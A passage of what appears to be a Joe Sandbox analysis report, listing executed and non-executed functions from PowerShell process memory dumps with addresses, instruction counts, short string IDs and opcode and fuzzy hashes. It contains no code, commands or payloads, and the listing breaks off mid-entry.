                                                                • Source File: 00000002.00000002.2152304683.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (B#I$(B#I$(B#I$(B#I
                                                                • API String ID: 0-1994586140
                                                                • Opcode ID: d027604ee0cd164059f7870c2308451c48479e2759e5abb591349d9c52ba1af7
                                                                • Instruction ID: 0fbcc97d84a9e7a882f4a0204f33c7b7a2bd83d9e4a6192b2789a4eb3104a24e
                                                                • Opcode Fuzzy Hash: d027604ee0cd164059f7870c2308451c48479e2759e5abb591349d9c52ba1af7
                                                                • Instruction Fuzzy Hash: 1A81FE31D1EA8E5FEBA9AB2858546787BA1EF15790F5800FAC44DCB1D3EA1CAC05C315
                                                                Function 00007FF848FE4073 Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2152304683.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 8>#I
                                                                • API String ID: 0-2340899229
                                                                • Opcode ID: fa02cad6099cd90500111f1c43f3a1b77c0d82b946d23c18c5e79d260e849a30
                                                                • Instruction ID: a06a4ac21564d96f2ebf2d439a3e82fd9b55975509f1be6f447983f1885cbb01
                                                                • Opcode Fuzzy Hash: fa02cad6099cd90500111f1c43f3a1b77c0d82b946d23c18c5e79d260e849a30
                                                                • Instruction Fuzzy Hash: A151D132A0DE4A4FEB9AEB2C94116B577E2EFA4260F5801BEC14DC71D2DF1CE8058249
                                                                Function 00007FF848FE40BF Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2152304683.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 8>#I
                                                                • API String ID: 0-2340899229
                                                                • Opcode ID: e0244144a4d389e21ef288323403b0f14f4dbd3c34b486655ac262785302eb69
                                                                • Instruction ID: b5840659fd99d4b04586c2bb4609b26c44f04f0a384880c63478b599169d6c46
                                                                • Opcode Fuzzy Hash: e0244144a4d389e21ef288323403b0f14f4dbd3c34b486655ac262785302eb69
                                                                • Instruction Fuzzy Hash: AD217A32E0DE8A4FEBAAEB18945117466D2FF642A0F4901BEC15DC71E2CF1CEC04824A
                                                                Function 00007FF848F19EF3 Relevance: .3, Instructions: 279COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2151860543.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7c2e65877edd56623a92ad84cccb6d76ee4c859a1676037539e6802d71963429
                                                                • Instruction ID: c904a7fdc94134a8c1ab6c2904f597ba5600c3a4833fab9a63170698531fbd0c
                                                                • Opcode Fuzzy Hash: 7c2e65877edd56623a92ad84cccb6d76ee4c859a1676037539e6802d71963429
                                                                • Instruction Fuzzy Hash: AE815D37D1EA915FE356BB7CAC620E53B50FF11BA9F0801B7D4888A0D3EE185C568399
                                                                Function 00007FF848DFE380 Relevance: .1, Instructions: 126COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2151270669.00007FF848DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DFD000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ff848dfd000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5579e96f30b182653b5d4e253a541ac60be305b732d992f8fd8ebe9ced7dd5b2
                                                                • Instruction ID: 7090fb648545b546cef8e2bcd59c410558644d95c710ef39ef56d08049704861
                                                                • Opcode Fuzzy Hash: 5579e96f30b182653b5d4e253a541ac60be305b732d992f8fd8ebe9ced7dd5b2
                                                                • Instruction Fuzzy Hash: C241137180EBC44FE7569B289849A563FF0EF52365F1502EFD088CF1A3D725A84AC792
                                                                Function 00007FF848F19768 Relevance: .1, Instructions: 125COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2151860543.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e278edca8964c0db4aad319dccb81b214ff7f82938432caf7a03d5231ed3b415
                                                                • Instruction ID: 5653b998504b6e2fa78a261773448e57ed369b3d6340f5b5d36d0c093b585a85
                                                                • Opcode Fuzzy Hash: e278edca8964c0db4aad319dccb81b214ff7f82938432caf7a03d5231ed3b415
                                                                • Instruction Fuzzy Hash: 4331EA3191CB489FDB1CDF5CA8066B97BE0FB99710F00422FE44993652DB70A856CBC2
                                                                Function 00007FF848F1A47C Relevance: .1, Instructions: 100COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2151860543.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 337a24d4aa74e4c1e6413390a81ccf2f5291638a25dcc20c4940baa2368ac43b
                                                                • Instruction ID: 4c835b489cc3248be2f6290e6e1752bccd1f50a3b89dedcfbb4835c47f530341
                                                                • Opcode Fuzzy Hash: 337a24d4aa74e4c1e6413390a81ccf2f5291638a25dcc20c4940baa2368ac43b
                                                                • Instruction Fuzzy Hash: 60213A3190C74C8FDB58DFAC984A7E97FF0EB96320F04426BD048C3152DA74945ACB91
                                                                Function 00007FF848F133B5 Relevance: .0, Instructions: 49COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2151860543.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                • Instruction ID: 191617ceee889ec1b776a361fbb2d1250ce1ead809f4672e64413ffe75dfec08
                                                                • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                • Instruction Fuzzy Hash: 7201677111CB0C4FDB44EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45
                                                                Function 00007FF848FE4400 Relevance: .0, Instructions: 35COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2152304683.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6bc3dfec7b44e5e4ed55b5a7bffc75f4d9d23cecc151d971211fa2d774cee2f2
                                                                • Instruction ID: 1748bdd0471d63ce1f14a84ad7e30f4222d13884554394d0400479534205c1b2
                                                                • Opcode Fuzzy Hash: 6bc3dfec7b44e5e4ed55b5a7bffc75f4d9d23cecc151d971211fa2d774cee2f2
                                                                • Instruction Fuzzy Hash: EEF0B832A0C9448FD758EB0CE4458A8B3E0FF04320F0500BAE049CB8A3DB2AAC648765

                                                                Non-executed Functions

                                                                Function 00007FF848F18995 Relevance: 5.1, Strings: 4, Instructions: 145COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2151860543.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: N_^$N_^$N_^$N_^
                                                                • API String ID: 0-3900292545
                                                                • Opcode ID: 423cf5fac9344ebac63c899d2a4b93703be77afed96c99c4808280d99209cce5
                                                                • Instruction ID: c805b2d289d1b0aa40bfe1b4b6981f0e830d586f984bdfb21806792342d6899d
                                                                • Opcode Fuzzy Hash: 423cf5fac9344ebac63c899d2a4b93703be77afed96c99c4808280d99209cce5
                                                                • Instruction Fuzzy Hash: EF417F73D1EAD26FE34A97285D690A57FA0EF22794F4D01F6C1888B0D3EE1C5C0A9356
                                                                Function 00007FF848F18BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2151860543.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: N_^4$N_^7$N_^F$N_^J
                                                                • API String ID: 0-3508309026
                                                                • Opcode ID: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                                • Instruction ID: f6facd9be01d464781fe06f2e9dfce22635aafd9ed82b64586b0b92a0b284f4c
                                                                • Opcode Fuzzy Hash: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                                • Instruction Fuzzy Hash: 8E213B7761A0259ED3417BBDBC145DA3750EF942B8B4502B2D298CF143EA1C708686D5

                                                                Executed Functions

                                                                Function 00007FF849016605 Relevance: 6.7, Strings: 5, Instructions: 418COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2244468494.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_7ff849010000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (B%I$(B%I$(B%I$(B%I$(B%I
                                                                • API String ID: 0-1877043794
                                                                • Opcode ID: 8fc6ffd9cd91fc93926bdc5ab59846071b315e8bb74b180764f1254b106cb487
                                                                • Instruction ID: 305ad07da27f12f9fcb67d333d1ab2131a8e02b2294d114648a585f79dad8668
                                                                • Opcode Fuzzy Hash: 8fc6ffd9cd91fc93926bdc5ab59846071b315e8bb74b180764f1254b106cb487
                                                                • Instruction Fuzzy Hash: 2BC12331D0EACA9FEBA9EF6858165B5BBA1EF15794F0401BBD04DC7083EA1AEC01C351
                                                                Function 00007FF84901662B Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2244468494.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_7ff849010000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (B%I$(B%I$(B%I$(B%I
                                                                • API String ID: 0-190937160
                                                                • Opcode ID: 9bc2c6b56adc34941fd61b51ec5f5d79e18bad85f41f96f3ddce0f0b51743738
                                                                • Instruction ID: 26cfcdbbbd672843c279fe229ac8201ffdd9e17fe0b929c3bd28820adb7059f1
                                                                • Opcode Fuzzy Hash: 9bc2c6b56adc34941fd61b51ec5f5d79e18bad85f41f96f3ddce0f0b51743738
                                                                • Instruction Fuzzy Hash: AB81F332D0EAC68FEBA9AF2858561747BA1EF11794B5901FBC04DCB1C3EA1ADC45C351
                                                                Function 00007FF848F49780 Relevance: .1, Instructions: 127COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2243772250.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_7ff848f40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a1d65f4f716b1bb1250749bb3d616bef010354d58440b1ce9c4f914c38709c8e
                                                                • Instruction ID: e63531785bfba952bcfe4feea6a196f635f03a3b2cc59d6834b48251774c71f9
                                                                • Opcode Fuzzy Hash: a1d65f4f716b1bb1250749bb3d616bef010354d58440b1ce9c4f914c38709c8e
                                                                • Instruction Fuzzy Hash: AB310B31A1CB884FEB19DF1C98066A97BF0FBA5710F00416FD049D3292DB706855CBC6
                                                                Function 00007FF848E2EB80 Relevance: .1, Instructions: 126COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2242935437.00007FF848E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E2D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_7ff848e2d000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1b75177870c0b70caedcd7e349c01dc73dfaad4360f5f13a3a2275f9fe1d7242
                                                                • Instruction ID: 65fd35950e386605889f31409fb66260e0558955b5a39bfb9bceba1959fbc271
                                                                • Opcode Fuzzy Hash: 1b75177870c0b70caedcd7e349c01dc73dfaad4360f5f13a3a2275f9fe1d7242
                                                                • Instruction Fuzzy Hash: A341483180DBC54FE756AB2898419623FF0FF52364F1505EFD089CB1A3D625A806C792
                                                                Function 00007FF848F4A668 Relevance: .1, Instructions: 97COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2243772250.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_7ff848f40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7b948dafdd99180299e648b5cee94018f416774cfdd4c379b707bd49cfd82f88
                                                                • Instruction ID: 26f1ea0f6629c1cda606909197247b9ff18bef96a728b1986359a36ed70c597a
                                                                • Opcode Fuzzy Hash: 7b948dafdd99180299e648b5cee94018f416774cfdd4c379b707bd49cfd82f88
                                                                • Instruction Fuzzy Hash: E521C53190CB4C8FDB58DF9C984A7E97BF0EBA9321F10812FD049C3152D675945ACB91
                                                                Function 00007FF848F433B5 Relevance: .0, Instructions: 49COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2243772250.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_7ff848f40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                • Instruction ID: 8501ce2366aa47fe50c32cae5305b62a305da60d827aaf0f190e9b8a75457062
                                                                • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                • Instruction Fuzzy Hash: 8B01447111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695DB26E882CB45
                                                                Function 00007FF848F4A0FB Relevance: .0, Instructions: 39COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2243772250.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_7ff848f40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3f3eafa8a1cae1e36758817903dbd3960c9e1897bdc2159644ceb9f5388c5d25
                                                                • Instruction ID: e22e6633b1d7ee07bdc1823b4496fbf7f43c7fac17751f88daf7fea63708cbd3
                                                                • Opcode Fuzzy Hash: 3f3eafa8a1cae1e36758817903dbd3960c9e1897bdc2159644ceb9f5388c5d25
                                                                • Instruction Fuzzy Hash: 52F0967650DACC4FDB42EF2C98690E9BFA0FFB5214B0402EBD549C71A1D7615958CB81
                                                                Function 00007FF84901414D Relevance: .0, Instructions: 37COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2244468494.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_7ff849010000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4dde3098333d7971d8ec52eeb0a9c01972c60f9383ee02cd7fcb3b35efc8c01e
                                                                • Instruction ID: 1d5d64d1be469882f9d22bb67c7a534f87c5ccaf9ded3d32ed4a57e011d17c44
                                                                • Opcode Fuzzy Hash: 4dde3098333d7971d8ec52eeb0a9c01972c60f9383ee02cd7fcb3b35efc8c01e
                                                                • Instruction Fuzzy Hash: E1F0BE32A0C5458FDB68EF0CE4068E8B3E0EF55361B1500BAE01DC71B3EB26EC418795
                                                                Function 00007FF849014400 Relevance: .0, Instructions: 35COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2244468494.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_7ff849010000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 112a12595af6fee074755759c4d24f73cb4590383f2623a2f6366cb166abe70c
                                                                • Instruction ID: 29481b79b24b2958cc9a81bfd70a83e206b6f771ecbca02093c782e5029c4356
                                                                • Opcode Fuzzy Hash: 112a12595af6fee074755759c4d24f73cb4590383f2623a2f6366cb166abe70c
                                                                • Instruction Fuzzy Hash: 18F0BE31A0C5848FDB64EF0CE4468E8B3E0FF04321B0500B6E109C7063EB26EC50C764
                                                                Function 00007FF8490141D1 Relevance: .0, Instructions: 29COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2244468494.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_7ff849010000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                • Instruction ID: 9e336600eb526626126efe3c72cd31527a87a4d20ecec040aa8814cef1828420
                                                                • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                • Instruction Fuzzy Hash: EEE01A31B0C809CFDB78EE0CE0419E973E5EB9836171101B7D14EC7571DA22EC518B80

                                                                Non-executed Functions

                                                                Function 00007FF848F48BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2243772250.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_7ff848f40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: K_^8$K_^<$K_^?$K_^J$K_^K$K_^N$K_^Q$K_^Y
                                                                • API String ID: 0-2350917820
                                                                • Opcode ID: 227aa69b1fbc1c82fa311b63e9fce6667358cd8e78cee4ad2729eeab0005292d
                                                                • Instruction ID: 9986dd489854e94b407d4e843bcd3186f07b3c56dbcf33a55f797e48646eb4ac
                                                                • Opcode Fuzzy Hash: 227aa69b1fbc1c82fa311b63e9fce6667358cd8e78cee4ad2729eeab0005292d
                                                                • Instruction Fuzzy Hash: 65212673A29515AACA02377CB8415D977A0EF543BC74503F3E018DF013DE1CA4CB8694

                                                                Executed Functions

                                                                Function 00007FF84901660A Relevance: 6.7, Strings: 5, Instructions: 440COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2401620428.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_7ff849010000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (B&I$(B&I$(B&I$(B&I$(B&I
                                                                • API String ID: 0-1750599480
                                                                • Opcode ID: b84e79c080e050ec44e7642abf5140b363b1951708c8fc371ae02468b4451153
                                                                • Instruction ID: ae69f614fa1700cdb441c7958bb1ca684141ea003e607534619f87ee9cb47002
                                                                • Opcode Fuzzy Hash: b84e79c080e050ec44e7642abf5140b363b1951708c8fc371ae02468b4451153
                                                                • Instruction Fuzzy Hash: BCD14232D0EACA9FEB69AB6858565B57BA1EF15394F0801BBD04CC7093EA1AEC05C351
                                                                Function 00007FF849014073 Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2401620428.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_7ff849010000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 8>&I
                                                                • API String ID: 0-4142972376
                                                                • Opcode ID: 94b82839bacefd40d1148d836f14a5608007a7ea3effe41618f57540e2bcd4b4
                                                                • Instruction ID: a34031da045d4e0948bef29032ee65de43e557cb35836cfbde8b76756112b4bf
                                                                • Opcode Fuzzy Hash: 94b82839bacefd40d1148d836f14a5608007a7ea3effe41618f57540e2bcd4b4
                                                                • Instruction Fuzzy Hash: 33510B32E0DA8A8FEBA9EF1C545267577E2EF55360F1801BAC04DC71A3EE19DC158351
                                                                Function 00007FF849014370 Relevance: 1.4, Strings: 1, Instructions: 147COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2401620428.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_7ff849010000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: p>&I
                                                                • API String ID: 0-2823867658
                                                                • Opcode ID: 63362ce0e63b9665e1f8516ab7b1913fad0ca5ee6ea5f0f41587340449befd76
                                                                • Instruction ID: 6abab9c947519591311e9c7dfd18b90a0ac42fda85fdd9dbc93b1548064add02
                                                                • Opcode Fuzzy Hash: 63362ce0e63b9665e1f8516ab7b1913fad0ca5ee6ea5f0f41587340449befd76
                                                                • Instruction Fuzzy Hash: D841FB31E0DA898FEBA5EF2C64526B477D1EF45760F0901BAC04DC71A3FA19EC158355
                                                                Function 00007FF8490140BF Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2401620428.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_7ff849010000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 8>&I
                                                                • API String ID: 0-4142972376
                                                                • Opcode ID: a31933a23839c08fa67124f7551f3adfa10b36ee2afdae15b89d8fd088fcf4cd
                                                                • Instruction ID: 420f908ad3341db3126ba1d3079dd62e78bdff0141ce98a74a70624bf692019f
                                                                • Opcode Fuzzy Hash: a31933a23839c08fa67124f7551f3adfa10b36ee2afdae15b89d8fd088fcf4cd
                                                                • Instruction Fuzzy Hash: 2321D232E0DACB8FEBB9EF1C545217476D6EF64290B5901BAC05DC71B2EE29DC548341
                                                                Function 00007FF8490143BC Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2401620428.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_7ff849010000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: p>&I
                                                                • API String ID: 0-2823867658
                                                                • Opcode ID: f2fdf2a30ef342619e15e27f1a99d3c9eb03aa089fc78ead15d2c8309b14950c
                                                                • Instruction ID: c3be82215b6fc75aae584ccd81bf793518876bd8d58fafa346b3f35c43d35820
                                                                • Opcode Fuzzy Hash: f2fdf2a30ef342619e15e27f1a99d3c9eb03aa089fc78ead15d2c8309b14950c
                                                                • Instruction Fuzzy Hash: 39112532D0E9868FEBB4EF28A4525B477E0FF443A0B4900B6D05DC71B2EA1AEC108351
                                                                Function 00007FF848F4644D Relevance: .7, Instructions: 661COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2400600817.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_7ff848f40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9f5eb6508e914abbb4fc6c4692a762700c44c017575dcda74d117b61ba3cd8cb
                                                                • Instruction ID: 223de1c572274f1e8f17fe65a975d29cddeee1dd5041c246edd0816ef10a3360
                                                                • Opcode Fuzzy Hash: 9f5eb6508e914abbb4fc6c4692a762700c44c017575dcda74d117b61ba3cd8cb
                                                                • Instruction Fuzzy Hash: C3C15030A1CA4D8FEF85EF58C455AA97BF1FF68740F14416AD409D7296DB38E881CB80
                                                                Function 00007FF848F49EF3 Relevance: .3, Instructions: 254COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2400600817.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_7ff848f40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 329d70bf0c687b6ba60b84a95513755ee3263ec040728bb4962419be81e954ee
                                                                • Instruction ID: cf1c47c98a6c49f6e0f2d2840c0405a2b8f90a0c299413114fa8c79da2d825a2
                                                                • Opcode Fuzzy Hash: 329d70bf0c687b6ba60b84a95513755ee3263ec040728bb4962419be81e954ee
                                                                • Instruction Fuzzy Hash: 29812A73D0E9864FE705EB3CA8960E97760FF6176DF0802BBC4888E093FE19145A8759
                                                                Function 00007FF848F49768 Relevance: .1, Instructions: 125COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2400600817.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_7ff848f40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: de1d653130a4c6e2d22add20556667a3aafe4267090d9fcbfbe52a61f2dbd62b
                                                                • Instruction ID: b87fef5ebb7714f02de017e9ed53c08c6c90e07892df1c0c8d1748fcbc86147b
                                                                • Opcode Fuzzy Hash: de1d653130a4c6e2d22add20556667a3aafe4267090d9fcbfbe52a61f2dbd62b
                                                                • Instruction Fuzzy Hash: 2D310C31A1CB488FDB58DB1CA80A6E97BE0FBA5710F10422FE449D3691DB31A8558BC2
                                                                Function 00007FF848E2E540 Relevance: .1, Instructions: 124COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2399692010.00007FF848E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E2D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_7ff848e2d000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
